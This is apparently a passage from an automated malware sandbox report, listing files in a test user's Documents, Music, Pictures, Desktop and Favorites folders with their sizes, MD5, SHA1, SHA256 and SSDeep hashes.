SSDeep: 384:K8JCbf+N6rtfzlO01cTQ/zx6iqcHoyjenU+GOFl1WXNZyroUte0zEqz:K8JpNGt7PcTGxRqqEUUFlC0UMe0z5z
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mJD0Lk7dF2uj7fNWL.doc 9.44 KB MD5: 1de6d6485cfd114b670f9ab1bbae5c27
SHA1: 7e502d58796d5af273aaa93ecbd7e9d35173e486
SHA256: 7c26fa21015a440d387840f8c52551b12092c8c7511163cb4d392890b1f56b1d
SSDeep: 192:LQrK4Dg6ruSdEUOGl5zST5jG/3MITVyX2aOgYodDnnpxoeP:7l6ZduGz2IU6wXMgYopLV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mpW-3B9.xlsx 74.14 KB MD5: 399cb7081a0d4ac96051bfa77f4d9e86
SHA1: 75fb0f1deca9052c40b0e36943f87de3cdecfc01
SHA256: 3b912402ffb9e767fa725983a57bcbfbacfab592ec9fce71866a3e48b8d3d6c0
SSDeep: 1536:89vm7Q8R7R561MNth4e1sm5dpIrcnlbsqddAZfhRsKHthcA:aeU8R7RYMNPR15pIw1ddA3RsKthcA
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\umnYAxK8Hd5gj.pptx 4.89 KB MD5: d9fc3a6c427095f6492d5d2c63c8eb07
SHA1: 0e5e7c4330aecadfe645786710e0bc05490281c2
SHA256: e6e0ed8e7bb0d78a94e26304fc712a670d26781e5a3604ed6fdd7e9f97fe1de7
SSDeep: 96:qvuxBM2NjeOb5FPelzGE6Z6K4afSrGHtSrxwScymzT1gf2g0:qv6Vfb5B86JZ6Kr4sME5w2l
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yNFdhsIRJWbx9.pptx 35.47 KB MD5: 822082c806f745610d4ed91174596489
SHA1: 546ef1a3707539890fde6aabf68fbc080bda844d
SHA256: 8b087352bf738c8efaec82a7405d2fe1d5b6cbb6966d3c9ee16c165270d5d9df
SSDeep: 768:WxTwDtKXze6JTkrOWbOmUGDrEHz8nox1Fvi8zQFx5MYSCFKf+UUbigMAhMLHJkbx:yrIVbOJGDY4oxC8zWx5MYDFY+UUbhsS9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Utu5uTreh3_BFU.mp3 83.66 KB MD5: 8e1b23678946e630e181fed57375c4c0
SHA1: 39edda0c088c1e5c034d09e755fa063eb1d2582d
SHA256: 6151580fbf31ffe7967cc7d336795fa5e31fb4dcae741fb151470ce559a96d91
SSDeep: 1536:kz9BJFeWdz/6cFnhUpaSsNPbUW/MI9n/zsWpj9kAzvFt98rnAHiI4IBgdAi:oJ0WdmKUwSsNP4W/P9n/zsWpxkKFf8rL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\2ZgBE.wav 64.05 KB MD5: b584fcff9fe90728af28934e4daa2f28
SHA1: 5dff0e6fca86ba3f66d54e01997cac7f2c9db1c6
SHA256: 1bb6d448d2be0333e91e5fa1f0bebc718247fc76bfc5b7dd3982bcf6edbc92a4
SSDeep: 1536:+LQfkOR4w5y77TZ1JEO1HDujwW5JU1zQs+zy7czN0Yi:+GktfaOFWjzy7S0Yi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\5V1FT5g1rxSJJ41de.m4a 5.18 KB MD5: 361158da77ae8f775b59b1e389672ef4
SHA1: aba9db3995dcab9f697171f9e8c3213463b91b5a
SHA256: ae46fd9b0f977be79d328d035283cc1c4e81d7c16b2a6aba58c08a107691cd07
SSDeep: 96:hPIi8ZSGZO3aV+7TK9NrnS+0vXlCa4gANC3htulwxfQif6EB:6Xy3oIT6S+Qz4gANWhtulwxYG6E
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\7HJiH UDq9SzzeN5I.m4a 65.66 KB MD5: 1789f2f39a630e85bfc4f8bcde6783d0
SHA1: b92fbbb35736a4d05a0d1910b7b8f082b73c8938
SHA256: 6e4c7f2c627a06a9b4e5a9acdf7f0de58ac6ed01dfbeab730c68a1fc5de5fe78
SSDeep: 1536:olG14wSUwJYnDvnLbgcCs0Tbj/TlSoOnIGkyEe4Hu0fT88T:oc1uwff50vs1n95ht088T
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\8ywMFiXrJ1mJNTYk.wav 74.71 KB MD5: 569bea0330939844882b35c66ccd46a2
SHA1: 328e66108690d22e6161efadb1701636c10e2465
SHA256: b4d05c6a0bfb2022a976a34a5609f7c1b196451ebbbe7905a904a20851caaeb3
SSDeep: 1536:bWylAHb3aRhu5Tj1wGs6ssBlNugL6uJRe+kCT7YIoiWGMAWriNUO+MZM:blAWRk1jZsUBlUgL6unrLT7YI4PAWriy
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\LgZcOmajdnsesY.m4a 29.00 KB MD5: b796e586e09beaf1b5c22a39fb1af225
SHA1: b01cc90b2c2f1785681d22dec6e61b5f3bd69d8a
SHA256: 6771e19eca800dc06661934c3d0b8e86842ef0c3b9b30b5d6d5948d9ab231d12
SSDeep: 768:gJM/IV9BCWCcybjb093L3eYgvY0W/Vy133WlB:ZQV9BCaybjb09LeYR0W/e3WlB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\NN082DlMLC6MxmlQyS42.wav 57.86 KB MD5: bf3eef5f970a766bb235d81906f4df6d
SHA1: 7655c1eb15aa06ecf814bfaaa3187d24de87e8fb
SHA256: 928e9aa1d7ce8e10edb156e26fbba73705c942752a01521fa474617c0a2a4896
SSDeep: 1536:rteCY/vJMohVfDHwgplRH4HRGqkOjT3lGlqdN8zRr:rteCY/vJ7DHwgplZKGqTfI0N8zRr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\tbTKJ0ZxbS6wZlGEphR.wav 94.54 KB MD5: 10e57792d6ced262b59e1e2d495f81f6
SHA1: 46c1105bc2549bbe6b8a75833ea67f670b025f22
SHA256: 39539b15079cf8e3f6875ed1934a79897b8a5a34877e43639ade28a42f343a04
SSDeep: 1536:v45Fmqlot0kRL56kGBuPB3TGYjyGE2F8OVhM7noYK2hATz7jrx1Ja2ScGogT:v45FpGt0aV6kzP9GYjyx2dM7nLAjoyE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wAomAj1M-1.mp3 62.08 KB MD5: fa2c60ea41a96f9d5aefb715edc1cb9a
SHA1: 96db7612753c9179fdc545cc7e6b03b5175ee291
SHA256: d0b5619d5456878ba14f46967827e141d8193d10a1b6ba5c0cdee2b1fd3d88e1
SSDeep: 1536:VzqCjj50ZSvOXpGO7r6ylvUlQXgDpXSeMkrqe8JHSps6qsBCxq1:QCjF0UGwO7rlRUlSgEn7HSCiCxM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\XQtttNc8l WMW7IPg.m4a 64.78 KB MD5: 6edf5ff63e2e3225e3cf3c6dad0652f1
SHA1: 28f11270e9ca4ab5e969fc68f99065ddc3778c30
SHA256: 20372426f86c4733d3ef11794f5cc4b027a4c5b9b8152ebb5b9951c0990be94a
SSDeep: 1536:cHBKVRKIc/vYruRBpOw/vcC4ZfMF7lRezVsBoidSrrpXMPHq:chOMXr1nXc/k3ez2Boi8rrpIq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_D7Y.m4a 10.44 KB MD5: fdab70c23a8676034b8be6148cbec3ee
SHA1: c92edc3a2153a3bd444504ad17839ae195906232
SHA256: 6d5642d96f254269cf2a3ca0b4cd491256c6c747b7480344778a6fc7bfc2ad03
SSDeep: 192:AaCOrehktR99nyMDlPHFGzFoP31r2En613zclg3zT9s8FEG7Yzah58MG:AraEktR99nyMpPFJ1CEn61zc8O8FEG7i
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-W0-.gif 63.12 KB MD5: 07956e64c8e8c4054bd2b1b61df6fbe4
SHA1: d90817a93edd92c219d0859b96076c94e0d6c6a3
SHA256: 704d10e9e408781edbf0e915d7cc68495b7e4d95d8d5a9cb71aaebc479faecd9
SSDeep: 1536:JY8Zb6xTs95xKObUp6lrCJcWHBHYgXd9xW++nCBMfT:JLZOxTwxKOwp6l2CEHYsSxL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Aor58F2ltwiS2qWZJE.bmp 77.20 KB MD5: 086431be998a4a61da2df7ccd402d030
SHA1: 600b16283857623dc0e57ccdf07f7154b190c133
SHA256: f63b913a1fd0bb3fcb3fdee4dcd803294e94ee0112b8cccd7c22110aa4112ea9
SSDeep: 1536:dBrwgKkbuDr2dboIIyPL7+sNJKSPwc1nUSYDhSNUD/MooqOSD7JjnlIG/8:ogKMdboITX+FSPwc1UHhSODkYOSD9lPk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\FDQ3v_tHbiNjViuE.jpg 43.20 KB MD5: d89c3ccf4a4a814e791498e5befd227a
SHA1: dcadc0da30c69491b6d03436a304ef44b4993c23
SHA256: a4cca4d9d1821163b4e4aa72defba3fd45ff82d74b2ab7a42c5366bcd6874983
SSDeep: 768:5vvNUd/8JUrQpKI1sBa4uQXOmPk4qKhS3/QMEVaqQ2HZUkKI9:5vvNUyOcoo2OmPk4qf39hz25GI9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\hiUvM1waNbZk-e.bmp 63.58 KB MD5: c5c5806be62ef5ca4035e6c92cda0580
SHA1: 9c6457044a8d0734459995a4b156040bcc0e701c
SHA256: c6f341d4d25fb99b2f0176286e47296054bd6730b8561e7b11f96d7a06880657
SSDeep: 1536:Hd9OuGDPrLjld4DdXc9NnrOpPyW28pjiFJcnrwJaXq75z5HT:Hd9yDrLnWoGyvSjtrwJa67f
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\L4Lb_VKCFG5Baj3.gif 4.34 KB MD5: 2200ca3388cbf2539aaebf523cfffab9
SHA1: 98ea1689df837eec8a56aaf4d9701fa479d28906
SHA256: e77573b27872a8d61d52f9fe8577f44874bbc126d23df48343a217c2e13ad2dc
SSDeep: 96:rVahhjW0EiXdqCRPUysd1r+7iyNnLTft+pLusQBg75xAXrp:JahMRiNPRcyscrT+pLZi8+7p
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MkdmiW2n2hm UFrse-.bmp 91.01 KB MD5: b204d84e119289dc801cd6d2cccb0d81
SHA1: 98c304db33771bfd0e67394cba212ab678866df4
SHA256: a217c662247e5543aca5b7560d4ec012d8451cfec5c95f646e3edef3187696ef
SSDeep: 1536:/hIkWquKvejqYI03euyLnuT7KbQQjfIFaHf9gaMFldsmtcAhCOkEsdvJOwDc6yp1:/4KveHI04uXK9kuFyFl7AJDOrKPW
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OFMo70Ypi.jpg 24.18 KB MD5: 7f4fbb0f3e6ebedf285f711115b51f8a
SHA1: 95030d0a373198cef67759d11875d5fc68003791
SHA256: 3242ea955bf2b9b99931a6f534e6c13d19822b9d6c12e2da66533c194e6e27af
SSDeep: 384:LKshCpfS5Pl50/T8SE70XXjdcf0VvoccSqbAI0NwTdjusk+N0Q31KpypKXpk0Te:WshCctw6m5csVgY9I/T5uJq0ofK5/e
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\VyatE0vXWAqC0OxRt_.jpg 10.45 KB MD5: 50a2b3d3ce6141d004651dd0373945bb
SHA1: 1f7c547b3914af6d035eb1fd04b6de735098282c
SHA256: 12edfc25938cff79db30e3fa76ab987d7c394a59d8f34e46f06ccdb2636a7991
SSDeep: 192:Q84nKScMEpp+D6i4YxKlVW4rayJCqnUhunpwLnPLHwrJb:Gn/CpM783NwHA5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ReEw7jE5wqOg.swf 75.38 KB MD5: 5d3363fe856a6ccc5fbeaefa75aa7548
SHA1: 6f64991deec519cbb4f37ff67c9ef23a98ebab97
SHA256: fdba71f735d122a75719910a72a74a9ddd6adbea02efba38940f23bf3cc05163
SSDeep: 1536:qPeptujcLMQHt9jYuPGcngPJ9XXZKOJK5LhW2Z7YMuAkJtE9w4h:qPeNWWGcgPJ98YQL047tuhLE9wq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\gW8MJuJm9dKBS.swf 87.03 KB MD5: 3cf2c04707467e93fbf929bb3ef8a19f
SHA1: 7a1cd0f31b6bc5ccd3ca40d75d7d294d0ea36357
SHA256: 8300ffd770d5a6c4c4dd52244ef930ecf6be737a4178ff2fc25ff53e3cedfc08
SSDeep: 1536:pPDh0lSa6JHPnXbZbe4b51va2Aep3XrTyqB/HcRM1oSJSRt3a1:pS0PnXdv55pnpL2s/HcIKR0
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\6lkmIZ.jpg 76.67 KB MD5: 8cafc70d348d501dd2d66d182b807f44
SHA1: 559191c9046fee74e6577421fa390d0656d267f6
SHA256: 56d76a3d68e03ae22eed1ee58c75f0103452fe682f75513cc9fd444ee043f71c
SSDeep: 1536:YKP41R4Jyrj/g6+ckCg9sSEtZmfkUCivsTETHIJsLKAQJCflJqmvLl5gX:YidmECBSsmfxCiET+ICLyEYOLl5gX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\bYco6U CoNywT.ots 50.06 KB MD5: 13b72a1c96a01184c987398086d13130
SHA1: e99a2fb46c7ffa0b7969680c51a067051433a5a7
SHA256: 31b02b4b253a04cdecc5e7a871204649a7f191d697609391f59f1a4afe526a89
SSDeep: 768:O+AQYWrG5dTC6nX6q+FU58Mr4L4jgm/Kcawd3i9sq4kTn+OS4g5a7mKk6SAY:O+/wdTC6EDMr4l3cawJi9ZNTn+OCyUAY
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\sH_lIdhNg4 u9hq.xls 25.49 KB MD5: b9a55e64a9c1e6db0b5bf1a40e01ebc0
SHA1: 5f71280c06056d3b4986781d5ecdaab20d0bd293
SHA256: 619bb83cd88087c0c76e3f2d00d1ea1d6c7f4d687f949acfe4c66e31d55e6b39
SSDeep: 768:utRyf8o0CIiNfwpGjtiDxWlZuhcaC1oXRLK:Sk0iZrEA041ohLK
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\UB qDPSTcD6SsAM5.pdf 41.09 KB MD5: 8bf556cf965a8f21a434198433f2b8e4
SHA1: dada660f273d200e4cfd4f31f147521bd50b8a24
SHA256: 757bad01f06376637d96e0e0418b0c656e453b24b9b88a509c1e33b68a470569
SSDeep: 768:IX4X7MafgUqtCYaCcCTN/eBFT6RUYL1UBXJXKl:w4gUqsYXcCTS6R1+NJXKl
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\4k4 81HVDXuJOl.odp 25.46 KB MD5: 0c1cfb927b1a1431ca654a96ac6d3664
SHA1: 63ceae1cf654a19104b136a42d82355f24e238df
SHA256: c19d7f186e2043addcc3955d95b2596f2227cfab30eb16fae112f6567a013965
SSDeep: 768:+UVBeefKSZSEH1LYO2OiGD20PIdO8i3CITOSAy6XWqe91:11fUC1LYOsG5gdO3CcOSx6GDL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\Rqjkx-Inyu564.bmp 65.02 KB MD5: 636891bd306d334991e73df6c28e3955
SHA1: b54713b64f3e8c6c457b386984d45380f078df96
SHA256: 1c08fb276f744488b292b89412b11288c7847fe24c05d125e2f03b96dc77af2d
SSDeep: 1536:62jn3Mv3N3R+ptpcjI31ybg4zWjcPIcQmJM75g3sVBFor:Zn3MvBR+h31r4zWYBcdUsVUr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wWuRiwRN3-J7Oj9WP.jpg 50.90 KB MD5: 2d62478ae86865e01f6f5ac77f2b119a
SHA1: cdce9bee12f47cb6d7bd8a4ccd7b1ab81edd94cb
SHA256: d7849d59f5957960d4fea0e1d758cacf3e498af075227d139abf7db9e3bea044
SSDeep: 1536:fYGqP4o9lD9SJFbBToHkHL/eq0nKlUnW8nOBE:fwBulqEHrXqgb8wE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst 265.08 KB MD5: e79c11a09aff4645c6ec0a793082fb41
SHA1: fedac5a1c9d9a2dbbb8dba2cf6d2b8466f1084c3
SHA256: d7f73ea970769a94d030ae7507b037118f41c71ebef162f1b9ed45f76f0d0ed3
SSDeep: 3072:22HfBneZr9IFne6dnPRxa4+UHo5wsj5pOmv64Gs7/714Z+afuNnKAs:1xSqlnPfHvqvl7zi+amxs
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\foWRjFtWYtlcWkIBF.ppt 35.20 KB MD5: 4444197582844660df42089525efd1bd
SHA1: dbe5402a6805b3cee90fe3553c072b5016d27e22
SHA256: 2710b7a173ce33faa846b3f83a8bd9979a34a8a294d9dc1aebc520b8f0de078d
SSDeep: 768:eX9KXFfQVtie0jKXNV1ATj6YnAHJjgKefYWHbHYcEFXRIlfrxyOhU:65mjKyv6YsJjgKefYaTYzNR2MOi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\l8IL3_dOyLyH.odp 95.46 KB MD5: c3581324f7720d561a2b59b917732a1f
SHA1: b7f1dbb11dbc20e4d86a716833eb4f0b568db728
SHA256: 7603f2c3876c352502e04b0f8d74cf4738e4dfbcdb658c48bb0e25c43d624fb0
SSDeep: 1536:aY9yA8xTJFu/3NBDDpVrgCpyM9QxDdI8Jb2l5+JggZO/LwmrkBUfjF1OrzyA3S7A:aNA8xqznpHpMxS245+igZ+6Ufh1O3h3t
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\QITXJJCFSuy.rtf 64.99 KB MD5: 3c6f30df0a3e795cb39d6d43173f6deb
SHA1: 8d8d7de94a585ea7f18c49fbf604958d5985b0d7
SHA256: a57026c36be7f0f46aa05b19f6ab48e281a7c05542e68f760e1fad0f3fe5c7af
SSDeep: 1536:aGmEvqtpS69xZam3V5/iOiZ0+1Y++dnHmY0Vwkii/XHly:XJy7lV5/GuSBUH8wf2Hly
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\wYeZ7WgnHNP8l.rtf 57.14 KB MD5: 5c5639fcde5c13940a1aa3e3e25eea00
SHA1: 3c855423a33d1eb97fb7ba725c5b3f24004a9a64
SHA256: a53db9190af68aba219d80e2bebb11daaa91e524542ab984044dd1372ff1f204
SSDeep: 1536:XNcA5zc8l9olhgz6YHYuTyDvsLq8YbkfUZZTHiTz:yA5j9oLs6YHYuTMkLqjzyz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url 314 bytes MD5: d274d5f98733903169baed1faabd47d5
SHA1: f49184dd8e51774890a9b6bc1d31b48adfa2179c
SHA256: a68b38273445b312f20c9fd61a84f0e86f5e6797c4f6799f56ff9e11fe1e588f
SSDeep: 6:Jnj6/Bb33qkx6TurITRh97fsgft2cKtFnC47+X6SUkyljawudkqSMeEPh7Wcii9a:lE533Ncl7kgVBKvZCylGwBqSMeEPsciD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url 304 bytes MD5: a0fefb5d36c911088ed4847639cd74e1
SHA1: c40396d8ecea752ad22a2fc3c812605f813cc2f2
SHA256: da2d599d23a631513b72f4412abf40fef356949defaf070f401d30a6475fc876
SSDeep: 6:Jnj6/BPUn3fTDJEk/fUDLYlWJFlX3SORFIK4NW5udkqSMeEPh7Wcii96Z:lEc3fTtE4MIWJLX3fKKMsBqSMeEPsciD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url 211 bytes MD5: 055d3a787413614bf829f6ae6625cc31
SHA1: fb6a3349e7d69a605e93bef63422174aab06f9e4
SHA256: ba5a18368818af36b0d6307bfb6b1a80d711ec683ca62fc76a231d18955eeb92
SSDeep: 6:Jnj6/BPUn3fTDJEk7wxWudkqSMeEPh7Wcii96Z:lEc3fTtETxWBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url 211 bytes MD5: e10624fbc9652ec36e37edd98999b635
SHA1: d8dc9dcc1048859ffe6f05dada8d545541f4454d
SHA256: f4ef9bf15a4d8f229c6324d974d30d97e40c18caa4072fc4e3b0174948ba4c61
SSDeep: 6:Jnj6/BPUn3fTDJEAnhIudkqSMeEPh7Wcii96Z:lEc3fTtEISBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url 212 bytes MD5: bb2ed6d1ec2100f22f95a517a13eb174
SHA1: 78d6a2df4cb207b25aabf67d4002623a25baa1ce
SHA256: c7c4f95bc1a727ca93ed874b9309fdda5b91127cf5ef3eb0de1673d5564edff5
SSDeep: 6:Jnj6/BPUn3fTDJEEsZpn0S5udkqSMeEPh7Wcii96Z:lEc3fTtEv5VBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url 211 bytes MD5: dd9712cb46511150dbfe45835ce42c0f
SHA1: 515d1447368aad5f623ed86f7e85ec2d4b3fff2f
SHA256: 5dfbc209712286482490d3addce3d4b4ff0ac19629e12086fe0ff30717b88952
SSDeep: 6:Jnj6/BPUn3fTDJEkqdUudkqSMeEPh7Wcii96Z:lEc3fTtEQBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url 211 bytes MD5: 7a6238a00ac32018029e0c5684359573
SHA1: b422254fa7333a62d9b791588b25edb67d1bc5cb
SHA256: ba5113cdacb1e2c2527741a6c43b1ce9e2dc6027ea68f722bcf6beb3c04fda40
SSDeep: 6:Jnj6/BPUn3fTDJEkqRYYudkqSMeEPh7Wcii96Z:lEc3fTtEEYBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url 211 bytes MD5: b7144e0457c92bf9355692df1b7848aa
SHA1: 1be00b2b12f4b1e0af4c619cf7e00989c91c55e6
SHA256: 6644683b1be3fed959b2d5221deb5d06e24983a437a361acb7a58137e96ee807
SSDeep: 6:Jnj6/BPUn3fTDJEkq38WudkqSMeEPh7Wcii96Z:lEc3fTtEd8WBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url 211 bytes MD5: f9393bd3e06707c02cd139388feac71e
SHA1: d8b07508c31b18f7a149b0bde98e2bfa2474616d
SHA256: 4dfb09c7bb9d672164f8bc31254a9592ab6661de95cadd2feb505ff1f02cb287
SSDeep: 6:Jnj6/BPUn3fTDJEkqbUudkqSMeEPh7Wcii96Z:lEc3fTtEVUBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url 211 bytes MD5: 1567d4518eef07ae0bf71c8b99978b75
SHA1: 2775eef83e60328fa3157b4e26a84b83a5a457cb
SHA256: ea388f526aac63ccc42b49a36830c5c6fc51f5db80d778fd87c326d2ceaee231
SSDeep: 6:Jnj6/BPUn3fTDJEkqFY0udkqSMeEPh7Wcii96Z:lEc3fTtEtBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 62.90 KB MD5: e529d9659990910fefa2b29b3d843e61
SHA1: d540379b9ff3c0be4e3ee97bb7d7a7097afbcd33
SHA256: dffba3c23c54e929e3f0482884be17f6491c522b3a59134214ae2fe4b491dc7d
SSDeep: 1536:R7ZykqEs1hCgQaJ0UxlSXBSMj1BzPZwp7KmhGi5tu:R7IXEs1uaJ0UxLMj1BrZwsti5tu
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a 16.79 KB MD5: 73dbcd5abc3f434c11af158f53276892
SHA1: 7ccabcc3e8cff79d994219471db94fb436e4c43d
SHA256: c2808d72674acd3b699c0555b7bc43ddd86c4d23eda1aa77d8a125cdc1a988fb
SSDeep: 384:RqOiwbw6/j9F1anc/D9MpJtvf2SAcRYmhQ/:p5NaniD9ytv+S72mhe
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3 65.17 KB MD5: ecbed22ea86943fc44b42f32fc8653bd
SHA1: 4dc03c590bf9b5d6949e388f2ee4fd745d17708b
SHA256: eb565c105b4f9190f2654cdea8c435cc7d71568267581c11c7a70f82dfdae621
SSDeep: 1536:AAcfLdmU+PhbSe3ooj2H/pdNx+8ccYo+abwUKkJU56:6T+pbC+Js8Y
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3 33.50 KB MD5: e157a4802828dd49d47d79b3f7d4ce7f
SHA1: f5e8622e0680d46c86df7561c714b18dd7224357
SHA256: 810e0ffe0df44e1a941b963c519b9983aa15c6a7f2a5cf5ed7004d541ec2011b
SSDeep: 384:jP1xO9O9OpbfSm5MwSofW9iFsUOUDH1YEKsHmWkuFJKUSt+EHFYdZvUg6XCfvxt/:bd+bfD5gofWMLyE6heAJ+ElVmJK+t
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lGrnoXKuinB.m4a 99.90 KB MD5: d10081304fa0c0c5710ba8eec82c0880
SHA1: 2bfd68ecbfbcbcd1a42875940a48196951a87563
SHA256: bbd55c5f878ff023723ef4230f4855e4ae9b8f3629bc9b23e51e5683874d5feb
SSDeep: 3072:vHtU6nO3a5PwIIGNe8rpM/6yzzLBCKeoX7B:yuga5DG8rpy6knBPeorB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lWn6_.m4a 88.07 KB MD5: dc0250d76d05d5a9343e93a01215b4c8
SHA1: bce112a1b7035e6aeb1cde62c72b8d7dbf8c9894
SHA256: d2f107381e536171ce32b00b854a9738fcbfdb1031233f355f07d30cd1152f8d
SSDeep: 1536:qt9MdiFPzJc5qnjcRqVZWqGnUfcw9SUWyjNiUOkOsRoXAOqEeKexd6F4:qt6WJjIR8jtcwjNZOJsRvSNe
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\O_o33d.m4a 91.89 KB MD5: e89a71d92ccdc23d271e7a1b8c94d732
SHA1: 9aa5e415dfc1a5ed25a8e7c311fb0d7b1db95960
SHA256: c6b6d64047d9e401d6b0f8cd898c1aa4352f3a28a19b9401092179b069850a66
SSDeep: 1536:sqITe2s2kjJYpgkgWgE5AexSoRnfj9sGyy0vnC44IQjUYxgi8qyyR7vg4G:179jGhAexSoRbAfqFIQvx/xyCDgZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\RU_Ytkp2w qp.mp3 84.47 KB MD5: d3e933eb1c4acbae1ba95cd1a478c677
SHA1: d85a3041d219be8f542a4b1dcc5ffdee75fd5597
SHA256: fbe7d4d9d307a898b077d843fe0aa363f19eebced55e9e0572f3284e9372ba8e
SSDeep: 1536:xHQnCtn4aEaBs11xpMmejGf+FxHCz5U29JJa5h/h62d/vfjaKUgZA17xa/D0XPdp:pZB4mepupgPnPITU2tJUyD0XPd8u/j
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\sGdLslAC.mp3 56.98 KB MD5: 57497efb3536776e50cd23fefa465580
SHA1: 2a461729305e1376110d89158a2762110b55d0c7
SHA256: f977d8b75db4df73f0c939ba943593b9fb66c0bdead0b40f906cf09fcbc84705
SSDeep: 1536:AaH1PtRWCVNoPNsAE1jc3uivwd4z4Ax/fa8MNLLtfufEg:jPLNSbsqb5pjq4f5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\W783g cZVYe_Q3ZTfs.mp3 23.86 KB MD5: 46b1c548960917fafd3a3bdeccc19b7d
SHA1: c039577e483e87ef3f2ae4b5d0421b8424972e35
SHA256: f775f35fbae883b80a4e43c96843fb3027197fae5dcd9e3ad7e0e5c946b52702
SSDeep: 384:SvDoyja79utGo716dbKLKqLbi7Dq/njOQ0UWqseyEGQc7FYYF9E71OehH:S7YM6oLKqLbi4njDH+yG5F9E74G
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\_BaDSqvWqTCo.m4a 99.29 KB MD5: bf500036ded8f446892e4db5ee973d70
SHA1: a0d9bcdb9b814305cb0cb464a19102fdd0c2e457
SHA256: b46b34e6f15c72ace3c3f9e3ffb64f2bbf5eefeae65469538b2d135adffd225c
SSDeep: 1536:AY4RjRSjL5T93Nc+V5ffgc9xR4uN3i7ej0gtHY5BsEcUfW/fNCj:h4R1SFT9hb9tOejgTsEWXNe
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\-ExuX9LOjl2Rf0Z.png 74.93 KB MD5: 54ff56fe6b0cdf923486f502839e142d
SHA1: 9d13d4cb75933a935258da7ad9e0feb4b5733c78
SHA256: 12b114dd2b4a51ec5a2e1f48c733b3f5c06d5cb41faaa0d29d97c7a126eb52aa
SSDeep: 1536:vcQIlMu5CZ4V90u2Sg0UwjaZk9LdLgqCyZ07Zxlp+jKm7QB:vEMuA6V97QwXWZ+4Mo
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\3mlI5OW4Ceei.png 55.62 KB MD5: 9dfcdb728cd882c00767af7ed154d257
